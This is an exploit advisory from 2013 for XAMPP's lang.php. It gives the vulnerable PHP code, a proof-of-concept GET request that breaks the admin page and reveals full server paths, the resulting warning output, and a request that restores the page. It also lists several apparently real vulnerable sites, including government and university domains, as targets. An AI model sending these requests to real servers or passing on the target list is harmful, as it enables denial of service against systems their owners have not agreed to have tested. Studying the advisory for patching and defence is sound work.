Xampp Dos And Full Path Disclosur

2013.01.23
Credit: Dshellnoi_Unix
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Dos And Full Path Disclosure in xampp # Category:webapps # Google Dork:????? # Date: 11-1-2013 # Exploit Author: Dshellnoi Unix # Vendor Homepage: http://www.apachefriends.org # Software Link: http://sourceforge.net/projects/xampp/ # Version: 1.5.1, 1.5.4, 1.8.1, 1.8.0, # Tested on: Windows #-----------------------------VULNERABIlITY DESCRIPTION------------------------------------# # The failure occurs by not properly validate data entry in the language chosen by the admin # The application expects the data input url to redirect to the index of the chosen language # The data sent in the url is written to the file lang.tmp #---------------------------------- VULN CODE----------------------------------------------# <?php $fp=fopen("lang.tmp","w"); fwrite($fp,basename($_SERVER['QUERY_STRING'])); fclose($fp); header("Location: index.php"); ?> #--------------------------POC-EXPLOIT-------------------------------# # Correct request : GET http| https ://domain/xampp/lang.php?en # # Exploit request : GET http| https ://domain/xampp/lang.php?KNOCKOUT+BY+EVILCODETEAM # #---------------------------OUTPUT---------------------------------------# Warning: include(lang/KNOCKOUT+BY+EVILCODETEAM.php) [function.include]: failed to open stream: No such file or directory in C:\apachefriends\xampp\htdocs\xampp\index.php on line 13 Warning: include() [function.include]: Failed opening 'lang/KNOCKOUT+BY+EVILCODETEAM.php' for inclusion (include_path='.;C:\apachefriends\xampp\php\pear\') in C:\apachefriends\xampp\htdocs\xampp\index.php on line 13 #-----------------------------DOMAINS POC-----------------------------------------------# http://simeXp.mic.gov.py/xampp/ http://1X63.22.69.5/xampp/ http://paXul.igl.uni-freiburg.de/xampp/ http://www.suckhoeXvang.vn/xampp/ http://katsXuka.mXine.nu http://map.mckXonnichiwa.com/xampp http://soXXu001.com/xampp/ #---------------------------------RESTORE-DOS-------------------------------------------# GET http| https ://domain/xampp/lang.php?en #Thanks to :Ivan sanchez, Juan carlos garcia, Luisfer :)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top